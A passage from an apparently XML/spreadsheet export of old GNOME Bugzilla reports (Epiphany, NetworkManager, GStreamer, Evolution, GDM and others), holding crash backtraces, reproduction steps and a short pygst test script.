#24 0x00000000 in ?? ()
No symbol table info available.
#25 0x00000000 in ?? ()
No symbol table info available.
#26 0x00000000 in ?? ()
No symbol table info available.
#27 0x00000000 in ?? ()
No symbol table info available.
#28 0x00000000 in ?? ()
No symbol table info available.
#29 0x00000000 in ?? ()
No symbol table info available.
#30 0x00000000 in ?? ()
No symbol table info available.
#31 0x00000000 in ?? ()
No symbol table info available.
#32 0x00000000 in ?? ()
No symbol table info available.
#33 0x00000000 in ?? ()
No symbol table info available.
#34 0x00000000 in ?? ()
No symbol table info available.
#35 0x00000000 in ?? ()
No symbol table info available.
#36 0x00000000 in ?? ()
No symbol table info available.
#37 0x00000000 in ?? ()
No symbol table info available.
#38 0x00000000 in ?? ()
No symbol table info available.
#39 0x00000000 in ?? ()
No symbol table info available.
#40 0x00000000 in ?? ()
No symbol table info available.
#41 0x08878a80 in ?? ()
No symbol table info available.
#42 0x00000000 in ?? ()
No symbol table info available.
#43 0x409ba274 in g_free () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#44 0x409bc904 in g_log () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#45 0x080e32f5 in ephy_ensure_dir_exists ()
No symbol table info available.
#46 0x00000004 in ?? ()
No symbol table info available.
#0  0x4075f431 in __waitpid_nocancel () from /lib/tls/libpthread.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-07-09 08:39 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product epiphany.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was equake@gmail.com.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>equake</t>
  </si>
  <si>
    <t>GSTREAMER-97454</t>
  </si>
  <si>
    <t>pthread code in v4l</t>
  </si>
  <si>
    <t>v4l uses pthread code it might be a good idea to convert this to GThread
calls instead.</t>
  </si>
  <si>
    <t>NETWORKMANAGER-301090</t>
  </si>
  <si>
    <t>Network Manager on Hoary</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Debian 3.1
Package: NetworkManager
Severity: critical
Version: GNOME2.10.0 unspecified
Gnome-Distributor: Ubuntu
Synopsis: Network Manager on Hoary
Bugzilla-Product: NetworkManager
Bugzilla-Component: Default
Bugzilla-Version: unspecified
BugBuddy-GnomeVersion: 2.0 (2.10.0)
Description:
Description of the crash:
NetworkManagerInfo crashes as soon as it is started
Steps to reproduce the crash:
1. Follow instructions to setup networkmanager
2. Log out log in
3. NetworkManagerInfo crashes
Expected Results:
How often does this happen?
Every Time
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/NetworkManagerNotification'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
`system-supplied DSO at 0xffffe000' has disappeared keeping its
symbols.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Thread debugging using libthread_db enabled]
[New Thread -1222637984 (LWP 19548)]
[New Thread -1224393808 (LWP 19555)]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0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb7475901 in select () from /lib/tls/i686/cmov/libc.so.6
#2  0xb7daa135 in _XPollfdCacheDel () from /usr/X11R6/lib/libX11.so.6
#3  0xb7daaf89 in _XRead () from /usr/X11R6/lib/libX11.so.6
#4  0xb7daba24 in _XReply () from /usr/X11R6/lib/libX11.so.6
#5  0xb7da7356 in XSync () from /usr/X11R6/lib/libX11.so.6
#6  0xb79d0e9d in gdk_flush () from /usr/lib/libgdk-x11-2.0.so.0
#7  0xb79aef77 in gdk_image_get_colormap () from
/usr/lib/libgdk-x11-2.0.so.0
#8  0xb79af072 in _gdk_image_get_scratch () from
/usr/lib/libgdk-x11-2.0.so.0
#9  0xb79cdc4f in _gdk_x11_convert_to_format ()
   from /usr/lib/libgdk-x11-2.0.so.0
#10 0xb79cdee5 in _gdk_x11_convert_to_format ()
   from /usr/lib/libgdk-x11-2.0.so.0
#11 0xb79aa2bc in gdk_draw_pixbuf () from /usr/lib/libgdk-x11-2.0.so.0
#12 0xb79b3e32 in gdk_pixmap_get_type () from
/usr/lib/libgdk-x11-2.0.so.0
#13 0xb79aa2bc in gdk_draw_pixbuf () from /usr/lib/libgdk-x11-2.0.so.0
#14 0xb79bf10c in gdk_window_clear_area_e () from
/usr/lib/libgdk-x11-2.0.so.0
#15 0xb79aa2bc in gdk_draw_pixbuf () from /usr/lib/libgdk-x11-2.0.so.0
#16 0xb70956b9 in g_module_check_init ()
   from /usr/lib/gtk-2.0/2.4.0/engines/libpixmap.so
#17 0xb70961dc in theme_pixbuf_render ()
   from /usr/lib/gtk-2.0/2.4.0/engines/libpixmap.so
#18 0xb7092f88 in ?? () from
/usr/lib/gtk-2.0/2.4.0/engines/libpixmap.so
#19 0x080d9ec8 in ?? ()
#20 0x081de650 in ?? ()
#21 0x00000000 in ?? ()
#22 0x00000000 in ?? ()
#23 0x000001ff in ?? ()
#24 0x00000000 in ?? ()
#25 0x00000000 in ?? ()
#26 0x00000000 in ?? ()
#27 0x0000010f in ?? ()
#28 0x00000015 in ?? ()
#29 0xb7092ed1 in ?? () from
/usr/lib/gtk-2.0/2.4.0/engines/libpixmap.so
#30 0xb7098dcc in ?? () from
/usr/lib/gtk-2.0/2.4.0/engines/libpixmap.so
#31 0x081de650 in ?? ()
#32 0x08145000 in ?? ()
#33 0xbfffe9d8 in ?? ()
#34 0xb7094050 in ?? () from
/usr/lib/gtk-2.0/2.4.0/engines/libpixmap.so
#35 0x08145000 in ?? ()
#36 0x081de650 in ?? ()
#37 0x00000000 in ?? ()
#38 0x081cdb00 in ?? ()
#39 0xbfffe9a0 in ?? ()
#40 0x00000001 in ?? ()
#41 0x00000001 in ?? ()
#42 0x00000000 in ?? ()
#43 0x00000000 in ?? ()
#44 0x0000010f in ?? ()
#45 0x00000015 in ?? ()
#46 0xb75b0a3b in g_type_check_instance_is_a ()
   from /usr/lib/libgobject-2.0.so.0
------- Bug moved to this database by unknown@bugzilla.gnome.org 2005-04-18 13:00 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product NetworkManager.
   Setting to default milestone for this product '---'
The original reporter of this bug does not have
   an account here. Reassigning to the person who moved
   it here unknown@bugzilla.gnome.org.
   Previous reporter was siddharthgdalal@hotmail.com.
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>siddharthgdalal</t>
  </si>
  <si>
    <t>GSTREAMER-490682</t>
  </si>
  <si>
    <t>[interleave] can't create more than one request sink pad</t>
  </si>
  <si>
    <t>Product: GStreamer
Component: gst-plugins-bad 
Version: 0.10.5-4
OS: Debian GNU/Linux lenny/sid
Plugin: interleave
Element: interleave
Description: I just can't request new sinks from interleave without trouble.
It always tells me: GStreamer-CRITICAL **: Padname sink%d is not unique in element 
I made this small pygst program that reproduces the bug.
#!/usr/bin/env python
# plugin: GStreamer plugins-bad - interleave-plugin
# bug: request sink bad doesn't work
import pygst
pygst.require(0.10)
import gst
# request pads works
adder = gst.element_factory_make(adder adder0)
print 'trying to request sinks from adder'
adder_sink0 = adder.get_request_pad(sink%d)
print 'adder_sink0: ok'
adder_sink1 = adder.get_request_pad(sink%d)
print 'adder_sink1: ok'
# request pads doesn't work (bug?)
interleave = gst.element_factory_make(interleave interleave0)
print 'trying to request sinks from interleave'
interleave_sink0 = interleave.get_request_pad(sink%d)
print 'interleave_sink0: ok'
# this will print:
#  GStreamer-CRITICAL **: Padname sink%d is not unique in element interleave0 not adding
interleave_sink1 = interleave.get_request_pad(sink%d)
print 'interleave_sink1: error should read above this line'
trying to request sinks from adder
adder_sink0: ok
adder_sink1: ok
trying to request sinks from interleave
interleave_sink0: ok
(bug.py:18769): GStreamer-CRITICAL **: Padname sink%d is not unique in element interleave0 not adding
interleave_sink1: error should read above this line</t>
  </si>
  <si>
    <t>petri.rokka</t>
  </si>
  <si>
    <t>PAN-358077</t>
  </si>
  <si>
    <t>save memory by strippping out common text in multipart message-ids</t>
  </si>
  <si>
    <t>Message-Ids in multipart articles are usually nearly identical like this:
In large newsgroups _many_ megs can be saved by stripping out common text.
There are lots of ways to do this but the implementation in the
following attachment uses this scheme:
We assign Article::Part's Message-Id by passing in its real Message-Id and
a reference key (which currently is always the owner Article's message_id).
The identical chars at the beginning (b) and end (e) of the two are counted.
b and e have an upper bound of UCHAR_MAX (255).
Article::Part::folded_message_id's first byte holds 'b'.
The unique middle characters follow then the last byte holds 'e'.
As a special case when the Part's Message-Id is equal to the key
part.folded_message_id is set to =.</t>
  </si>
  <si>
    <t>GDM-354746</t>
  </si>
  <si>
    <t>gdm does not handle xdmcp and tcp deny connections to X server correctly</t>
  </si>
  <si>
    <t>Please describe the problem:
Open gdmsetup then click tab Security then :
- select box Enable xdmcp
- then if you hit box Deny TCP connections to X server (disables xforwarding but does not affect xdmcp) you cannot get a display from another machine so that affects xdmcp. When you deselect the box that works.
Steps to reproduce:
1. Open gdmsetup
2. Click tab Security
3. Select box Enable xdmcp
4. Select box Deny TCP connections to X server (disables xforwarding but does not affect xdmcp)
5. Connect to another machine and try to send the display on the first one
Actual results:
The display does not come on the first machine you have an error Cannot open :0
Expected results:
The display should be opened on the first machine (that works when you deselect the box Deny TCP... and restart gdm).
Does this happen every time?
Yes
Other information:</t>
  </si>
  <si>
    <t>jean-pierre.dion</t>
  </si>
  <si>
    <t>PYGTK-316581</t>
  </si>
  <si>
    <t>pango.LayoutLine.index_to_x() keyword is wrong</t>
  </si>
  <si>
    <t>In pango.LayoutLine.index_to_x() the keyword x_pos is used for the first param
but it should be index_</t>
  </si>
  <si>
    <t>finlay</t>
  </si>
  <si>
    <t>GNOME-BLUETOOTH-584905</t>
  </si>
  <si>
    <t>GNOME-BLUETOOTH</t>
  </si>
  <si>
    <t>Failed pairing looks weird</t>
  </si>
  <si>
    <t>1. Launch wizard
2. Try to pair with phone
3. Dismiss pairing on phone
3. Looks weird
No close button all assistant buttons are disabled can't close wizard.</t>
  </si>
  <si>
    <t>gnome-bluetooth-general-maint</t>
  </si>
  <si>
    <t>EVOLUTION-212258</t>
  </si>
  <si>
    <t>Difficult to change To: field when responding to a forwarded message</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Evolutions address completion mechanism insists on completing to
the sender of a forwarded message when attempting to reply to this
message.  It seems to be nearly impossible to use a message forwarded
to you as a foundation for a response to someone else e.g. the original
author of the forwarded message.
Steps to reproduce the problem:
1. Receive a message forwarded to you from 
2. Reply to this message.  To field will contain .
3. Try to change the To: field to .  
Actual Results:
Evolution will persistently complete anything you type to .
The only reliable way to complete the transaction will be to select 
New Message and cut/paste the message body into the new message
and select a new recipient in the new message window.
Expected Results:
I would expect to be able to reply to a forwarded message and send
my message to anyone I please e.g. the original author of the
forwarded message.
How often does this happen? 
Always at least when the  address contains characters that
can be found in the  address.  
Additional Information:</t>
  </si>
  <si>
    <t>DASHER-347095</t>
  </si>
  <si>
    <t>Application style - direct entry crashes</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. change application style to direct entry
2. zoom in on text as per normal usage of dasher
3. dasher will crash before reaching any text
Stack trace:
(/usr/bin/dasher:9747): GLib-GObject-WARNING **: invalid (NULL) pointer instance
(/usr/bin/dasher:9747): GLib-GObject-CRITICAL **: g_signal_connect_data: assertion `G_TYPE_CHECK_INSTANCE (instance)' failed
Other information:</t>
  </si>
  <si>
    <t>jmgm3</t>
  </si>
  <si>
    <t>EVOLUTION-461365</t>
  </si>
  <si>
    <t>very verbose e-utils-WARNING **: Event already in progress.</t>
  </si>
  <si>
    <t>GSTREAMER-338897</t>
  </si>
  <si>
    <t>Videoscale crashes as part of DVD to Ogg transcoding</t>
  </si>
  <si>
    <t>Steps to reproduce:
gst-launch-0.10 -v dvdreadsrc title=3 ! decodebin name=dvd dvd. !
ffmpegcolorspace ! videoscale method=1 ! video/x-raw-yuvwidth=360height=288 !
theoraenc ! queue ! oggmux name=mux ! fakesink silent=true dvd. ! audioconvert !
vorbisenc ! queue ! mux.
This pipeline segfaults. Setting 'method' in videoscale to 0 makes it work.
Probably related to liboil. Using liboil CVS.
Stack trace:
(gdb) thread apply all bt
Thread 7 (process 28646):
#0  0x00918402 in __kernel_vsyscall ()
#1  0x00a21cac in poll () from /lib/libc.so.6
#2  0x00be7363 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#3  0x00be76d9 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#4  0x003138fa in gst_bus_poll (bus=0x87ef0c0 events=GST_MESSAGE_ANY
    timeout=-1) at gstbus.c:858
#5  0x08049f80 in event_loop (pipeline=0x87ee948 blocking=1
    target_state=GST_STATE_PAUSED) at gst-launch.c:367
#6  0x0804b09d in main (argc=Cannot access memory at address 0x5
) at gst-launch.c:646
Thread 6 (process 28647):
#0  0x00918402 in __kernel_vsyscall ()
#1  0x00cae216 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0x0013790c in gst_queue_loop (pad=0x880c0e0) at gstqueue.c:848
#3  0x00349af3 in gst_task_func (task=0x8843410 tclass=0x8839a50)
    at gsttask.c:193
#4  0x00c0336c in g_thread_pool_push () from /usr/lib/libglib-2.0.so.0
#5  0x00c018ef in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
#6  0x00cab3b6 in start_thread () from /lib/libpthread.so.0
#7  0x00a2b33e in clone () from /lib/libc.so.6
---Type  to continue or q  to quit---
Thread 5 (process 28648):
#0  0x00918402 in __kernel_vsyscall ()
#1  0x00cae216 in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#2  0x0013790c in gst_queue_loop (pad=0x880c6e0) at gstqueue.c:848
#3  0x00349af3 in gst_task_func (task=0x8843460 tclass=0x8839a50)
    at gsttask.c:193
#4  0x00c0336c in g_thread_pool_push () from /usr/lib/libglib-2.0.so.0
#5  0x00c018ef in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
#6  0x00cab3b6 in start_thread () from /lib/libpthread.so.0
#7  0x00a2b33e in clone () from /lib/libc.so.6
Thread 4 (process 28649):
#0  0x00918402 in __kernel_vsyscall ()
#1  0x00cb08c1 in __lll_mutex_unlock_wake () from /lib/libpthread.so.0
#2  0x00cad8f1 in _L_mutex_unlock_397 () from /lib/libpthread.so.0
#3  0x00cad7e1 in pthread_mutex_unlock () from /lib/libpthread.so.0
#4  0x0013b11a in gst_queue_chain (pad=0x8868818 buffer=0x886c118)
    at gstqueue.c:721
#5  0x0033213c in gst_pad_chain (pad=0x8868818 buffer=0x886c118)
    at gstpad.c:3223
#6  0x003328ce in gst_pad_push (pad=0x88306e0 buffer=0x886c118)
    at gstpad.c:3337
#7  0x0058e99c in gst_mpeg_demux_send_subbuffer (mpeg_demux=0x8866018
---Type  to continue or q  to quit---
    outstream=0x886e838 buffer=0x889e6f0 timestamp=18446744073709551615
    offset=1 size=2025) at gstmpegdemux.c:927
#8  0x00592da3 in gst_dvd_demux_send_subbuffer (mpeg_demux=0x8866018
    outstream=0x886e838 buffer=0x889e6f0 timestamp=18446744073709551615
    offset=9 size=2025) at gstdvddemux.c:948
#9  0x0058fb9a in gst_mpeg_demux_parse_pes (mpeg_parse=0x8866018
    buffer=0x889e6f0) at gstmpegdemux.c:875
#10 0x0058c2ad in gst_mpeg_parse_chain (pad=0x8830320 buffer=0x889e6f0)
    at gstmpegparse.c:732
#11 0x0033213c in gst_pad_chain (pad=0x8830320 buffer=0x8843a98)
    at gstpad.c:3223
#12 0x003328ce in gst_pad_push (pad=0x87649d8 buffer=0x8843a98)
    at gstpad.c:3337
#13 0x0013dfda in gst_type_find_element_chain (pad=0x8764918 buffer=0x8843a98)
    at gsttypefindelement.c:565
#14 0x0033213c in gst_pad_chain (pad=0x8764918 buffer=0x8843a98)
    at gstpad.c:3223
#15 0x00325a07 in gst_proxy_pad_do_chain (pad=0x87f8000 buffer=0x8843a98)
    at gstghostpad.c:205
#16 0x0033213c in gst_pad_chain (pad=0x87f8000 buffer=0x8843a98)
    at gstpad.c:3223
#17 0x003328ce in gst_pad_push (pad=0x8764858 buffer=0x8843a98)
    at gstpad.c:3337
---Type  to continue or q  to quit---
#18 0x0015a526 in gst_base_src_loop (pad=0x8764858) at gstbasesrc.c:1439
#19 0x00349af3 in gst_task_func (task=0x88434b0 tclass=0x8839a50)
    at gsttask.c:193
#20 0x00c0336c in g_thread_pool_push () from /usr/lib/libglib-2.0.so.0
#21 0x00c018ef in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
#22 0x00cab3b6 in start_thread () from /lib/libpthread.so.0
#23 0x00a2b33e in clone () from /lib/libc.so.6
Thread 3 (process 28651):
#0  0x00329101 in gst_debug_construct_term_color (colorinfo=0) at gstinfo.c:530
#1  0x00329457 in gst_debug_log_default (category=0x879e678
    level=GST_LEVEL_LOG file=0x1421c6 gstqueue.c
    function=0x14310a gst_queue_handle_sink_event line=561
    object=0x880c918 message=0x227acd0 unused=0x0) at gstinfo.c:572
#2  0x0032958b in gst_debug_log_valist (category=0x879e678
    level=GST_LEVEL_LOG file=0x1421c6 gstqueue.c
    function=0x14310a gst_queue_handle_sink_event line=561
    object=0x880c918 format=0x1422fc adding event %p of type %d
    args=0x227ad4c ï¿½ï¿½~\b\006\002) at gstinfo.c:422
#3  0x00329631 in gst_debug_log (category=0x879e678 level=GST_LEVEL_LOG
    file=0x1421c6 gstqueue.c
    function=0x14310a gst_queue_handle_sink_event line=561
    object=0x880c918 format=0x1422fc adding event %p of type %d)
---Type  to continue or q  to quit---
    at gstinfo.c:382
#4  0x00139a6c in gst_queue_handle_sink_event (pad=0x880c620 event=0x87ebdb8)
    at gstqueue.c:560
#5  0x0032eb88 in gst_pad_send_event (pad=0x880c620 event=0x87ebdb8)
    at gstpad.c:3788
#6  0x0032f2aa in gst_pad_push_event (pad=0x880c560 event=0x87ebdb8)
    at gstpad.c:3654
#7  0x00828f3c in gst_vorbis_enc_sink_event (pad=0x880c4a0 event=0x87ebdb8)
    at vorbisenc.c:910
#8  0x0032eb88 in gst_pad_send_event (pad=0x880c4a0 event=0x87ebdb8)
    at gstpad.c:3788
#9  0x0032f2aa in gst_pad_push_event (pad=0x880c3e0 event=0x87ebdb8)
    at gstpad.c:3654
#10 0x0015ea1d in gst_base_transform_sink_event (pad=0x880c320
    event=0x87ebdb8) at gstbasetransform.c:1133
#11 0x0032eb88 in gst_pad_send_event (pad=0x880c320 event=0x87ebdb8)
    at gstpad.c:3788
#12 0x00325cd7 in gst_proxy_pad_do_event (pad=0x8838f08 event=0x87ebdb8)
    at gstghostpad.c:137
#13 0x0032eb88 in gst_pad_send_event (pad=0x8838f08 event=0x87ebdb8)
    at gstpad.c:3788
#14 0x0032f2aa in gst_pad_push_event (pad=0x8868e18 event=0x87ebdb8)
    at gstpad.c:3654
---Type  to continue or q  to quit---
#15 0x00330216 in gst_pad_event_default (pad=0x8868d58 event=0x87ebdb8)
    at gstpad.c:2764
#16 0x002473d5 in fluac3dec_event (pad=0x8868d58 event=0x87ebdb8)
    at fluac3dec.c:226
#17 0x0032eb88 in gst_pad_send_event (pad=0x8868d58 event=0x87ebdb8)
    at gstpad.c:3788
#18 0x0032f2aa in gst_pad_push_event (pad=0x8868c98 event=0x87ebdb8)
    at gstpad.c:3654
#19 0x00137a3e in gst_queue_loop (pad=0x8868c98) at gstqueue.c:801
#20 0x00349af3 in gst_task_func (task=0x8843b38 tclass=0x8839a50)
    at gsttask.c:193
#21 0x00c0336c in g_thread_pool_push () from /usr/lib/libglib-2.0.so.0
#22 0x00c018ef in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
#23 0x00cab3b6 in start_thread () from /lib/libpthread.so.0
#24 0x00a2b33e in clone () from /lib/libc.so.6
Thread 2 (process 28652):
#0  0x00918402 in __kernel_vsyscall ()
#1  0x00cae48c in pthread_cond_timedwait@@GLIBC_2.3.2 ()
   from /lib/libpthread.so.0
#2  0x057cfbf7 in ?? () from /usr/lib/libgthread-2.0.so.0
#3  0x00bccf41 in g_async_queue_sort () from /usr/lib/libglib-2.0.so.0
#4  0x00c0355f in g_thread_pool_push () from /usr/lib/libglib-2.0.so.0
---Type  to continue or q  to quit---
#5  0x00c018ef in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
#6  0x00cab3b6 in start_thread () from /lib/libpthread.so.0
#7  0x00a2b33e in clone () from /lib/libc.so.6
Thread 1 (process 28650):
#0  0x00000000 in ?? ()
#1  0x0017004a in vs_scanline_resample_linear_Y (dest=0x886c400 \2103ï¿½
    src=0xb5ed8008 \r\023\r\020\r\024\f\022 '\020' ...
    n=360 accumulator=0x1879d68 increment=131254) at vs_scanline.c:74
#2  0x0016f55e in vs_image_scale_linear_Y (dest=0x8806180 src=0x8806170
    tmpbuf=0x886c400 \2103ï¿½) at vs_image.c:563
#3  0x0016d8fe in gst_video_scale_transform (trans=0x8806008 in=0x88545e8
    out=0x889e650) at gstvideoscale.c:713
#4  0x0015da25 in gst_base_transform_handle_buffer (trans=0x8806008
    inbuf=0x88545e8 outbuf=0x1879f08) at gstbasetransform.c:1357
#5  0x0015e90e in gst_base_transform_chain (pad=0x8764cd8 buffer=0x88545e8)
    at gstbasetransform.c:1447
#6  0x0033213c in gst_pad_chain (pad=0x8764cd8 buffer=0x88545e8)
    at gstpad.c:3223
#7  0x003328ce in gst_pad_push (pad=0x8764c18 buffer=0x88545e8)
    at gstpad.c:3337
#8  0x0015e972 in gst_base_transform_chain (pad=0x8764b58 buffer=0x88545e8)
    at gstbasetransform.c:1453
---Type  to continue or q  to quit---
#9  0x0033213c in gst_pad_chain (pad=0x8764b58 buffer=0x88545e8)
    at gstpad.c:3223
#10 0x00325a07 in gst_proxy_pad_do_chain (pad=0x8838e40 buffer=0x88545e8)
    at gstghostpad.c:205
#11 0x0033213c in gst_pad_chain (pad=0x8838e40 buffer=0x88545e8)
    at gstpad.c:3223
#12 0x003328ce in gst_pad_push (pad=0x8868a58 buffer=0x88545e8)
    at gstpad.c:3337
#13 0x004d13d9 in flumpeg2vdec_sink_chain (pad=0x906b075 buf=0x0)
    at flumpeg2vdec.c:242
#14 0x0033213c in gst_pad_chain (pad=0x8868998 buffer=0x886c118)
    at gstpad.c:3223
#15 0x003328ce in gst_pad_push (pad=0x88688d8 buffer=0x886c118)
    at gstpad.c:3337
#16 0x00138386 in gst_queue_loop (pad=0x88688d8) at gstqueue.c:769
#17 0x00349af3 in gst_task_func (task=0x8843ae8 tclass=0x8839a50)
    at gsttask.c:193
#18 0x00c0336c in g_thread_pool_push () from /usr/lib/libglib-2.0.so.0
#19 0x00c018ef in g_thread_create_full () from /usr/lib/libglib-2.0.so.0
#20 0x00cab3b6 in start_thread () from /lib/libpthread.so.0
#21 0x00a2b33e in clone () from /lib/libc.so.6
Other information:</t>
  </si>
  <si>
    <t>PAN-122753</t>
  </si>
  <si>
    <t>Task Manager listview does not follow cursor focus</t>
  </si>
  <si>
    <t>If you select an item in the Task Manager's window and then use the
PgUp/PgDn keys the cursor moves but the contents of the window do not
scroll to follow it.  This is different than the behavior in the Header
Group or Body panes.</t>
  </si>
  <si>
    <t>buckyball</t>
  </si>
  <si>
    <t>ANJUTA-507444</t>
  </si>
  <si>
    <t>plugins: debug-manager</t>
  </si>
  <si>
    <t>Enable Breakpoint menu item doesn't change name</t>
  </si>
  <si>
    <t>Please describe the problem:
In the popup menu of the breakpoint tab is an entry Enable Breakpoint. It doesn't change its name to Disable Breakpoint
Steps to reproduce:
1. Create breakpoint (Is enabled by default)
2. Right click on breakpoint in breakpoint tab
3. There's an entry Enable Breakpoint
4. After clicking it disables the breakpoint
5. Right click again
6. Now it's correct the item Enable Breakpoint
Actual results:
Expected results:
The menu item name should change to Disable Breakpoint if enabled. As alternative you rename it to Toogle Breakpoint Enable State or something else.
Does this happen every time?
Yes
Other information:
Anjuta 2.3.1
Maybe a user could be confused by removing/adding/deleting breakpoints and simply enable/disable breakpoints. We should take care of the menu names here. And also take care in the language translations!</t>
  </si>
  <si>
    <t>NAUTILUS-85658</t>
  </si>
  <si>
    <t>[ui-review][doc] Properties dialog string changes</t>
  </si>
  <si>
    <t>The following issues came out of the recent ui-review and are recommended
for fixing prior to GNOME 2.0.1:
- Text field on basic tab needs a label suggestion was _Name
- Items on 'Permissions' tab should have mnemonics
- s/Number View/Number view
- s/Last Changed/Last changed</t>
  </si>
  <si>
    <t>EVOLUTION-204869</t>
  </si>
  <si>
    <t>The direction of Search message is sticky (once a search is begun the Find forward option state changes have no effect).</t>
  </si>
  <si>
    <t>Repro:
Begin Search message looking for e
Hit Search a few times to begin stepping
through the occurances of the string.
Now uncheck the Search forward option
and hit Search a few more times.
Result:
The search continues to move forward rather
than changing to a backwards motion.
This bug also occurs when a search begins
with the Search forward option unchecked.
Checking the option fails to cause additional
clicks on Search to find in the forwards 
direction.</t>
  </si>
  <si>
    <t>GNOME-CORE-15826</t>
  </si>
  <si>
    <t>Crashed while selecting from the menu</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.0
Synopsis: Crashed while selecting from the menu
Class:    sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.14-5.0 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.7
GTK+: 1.2.7
ORBit: ORBit 0.5.1
gnome-libs: gnome-libs 1.2.0
libxml: 1.8.7
gnome-print: gnome-print-0.20-0_helix_1
gnome-core: gnome-core-1.2.0-0_helix_4
Description:
The panel crashed while I was simply selecting the Panel menu item
from the man Gnome menu.
Debugging information:
0x4059f8e9 in __wait4 () from /lib/libc.so.6
#0  0x4059f8e9 in __wait4 () from /lib/libc.so.6
#1  0x405fe1ec in ?? () from /lib/libc.so.6
#2  0x40159111 in gnome_segv_handle (signum=11) at gnome-init.c:655
#3  0x4052cc68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x40680b57 in next_frame (data=0x8196838) at mailcheck.c:370
#5  0x40099e5d in g_timeout_dispatch (source_data=0x8194750 
    dispatch_time=0xbffff40c user_data=0x8196838) at gmain.c:1300
#6  0x40098f96 in g_main_dispatch (dispatch_time=0xbffff40c) at gmain.c:656
#7  0x40099561 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#8  0x40099701 in g_main_run (loop=0x8160a30) at gmain.c:935
#9  0x4029a719 in gtk_main () at gtkmain.c:476
#10 0x805591e in main (argc=5 argv=0xbffff4d4) at main.c:275
#0  0x4059f8e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405fe1ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x40159111 in gnome_segv_handle (signum=11) at gnome-init.c:655
estatus = -1073745296
signum = -512
in_segv = 1
pid = 0
#3  0x4052cc68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x40680b57 in next_frame (data=0x8196838) at mailcheck.c:370
mc = (MailCheck *) 0x51002e50
#5  0x40099e5d in g_timeout_dispatch (source_data=0x8194750 
    dispatch_time=0xbffff40c user_data=0x8196838) at gmain.c:1300
source_data = 0x8194750
dispatch_time = (GTimeVal *) 0xfffffe00
user_data = 0xfffffe00
#6  0x40098f96 in g_main_dispatch (dispatch_time=0xbffff40c) at gmain.c:656
656	in gmain.c
was_in_call = 0
hook_data = 0x8196838
source_data = 0x8194750
dispatch = (gboolean (*)()) 0x40099e40 
need_destroy = 0
source = (GSource *) 0x0
#7  0x40099561 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
877	in gmain.c
block = 1
hook = (GHook *) 0x80a8a48
current_time = {tv_sec = 962336978 tv_usec = 370281}
n_ready = 2
current_priority = 0
timeout = 8
retval = 0
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:12 -------
This bug was previously known as bug 15826 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=15826
Originally filed under the gnome-core product and panel component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (mikey_n@paradise.net.nz) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>mikey_n</t>
  </si>
  <si>
    <t>YELP-417366</t>
  </si>
  <si>
    <t>GNOME Goal #3: Remove Application category from .desktop files</t>
  </si>
  <si>
    <t>Please describe the problem:
yelp.desktop.in.in -&gt; Remove Application
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>wjsape</t>
  </si>
  <si>
    <t>GNOME-LIBS-79680</t>
  </si>
  <si>
    <t>Files missing from POTFILES.{in|skip} in gnome-libs</t>
  </si>
  <si>
    <t>This is with latest CVS:
$ intltool-update -M
mismatched quotes at line 193 in ../support/vasprintf.c
mismatched quotes at line 194 in ../support/vasprintf.c
mismatched quotes at line 216 in ../devel-docs/gnomeui/gnomeui-scan.c
mismatched quotes at line 217 in ../devel-docs/gnomeui/gnomeui-scan.c
mismatched quotes at line 238 in ../devel-docs/gnomeui/gnomeui-scan.c
mismatched quotes at line 239 in ../devel-docs/gnomeui/gnomeui-scan.c
mismatched quotes at line 277 in ../devel-docs/gnomeui/gnomeui-scan.c
mismatched quotes at line 278 in ../devel-docs/gnomeui/gnomeui-scan.c
mismatched quotes at line 280 in ../devel-docs/gnomeui/gnomeui-scan.c
mismatched quotes at line 281 in ../devel-docs/gnomeui/gnomeui-scan.c
mismatched quotes at line 291 in ../devel-docs/gnomeui/gnomeui-scan.c
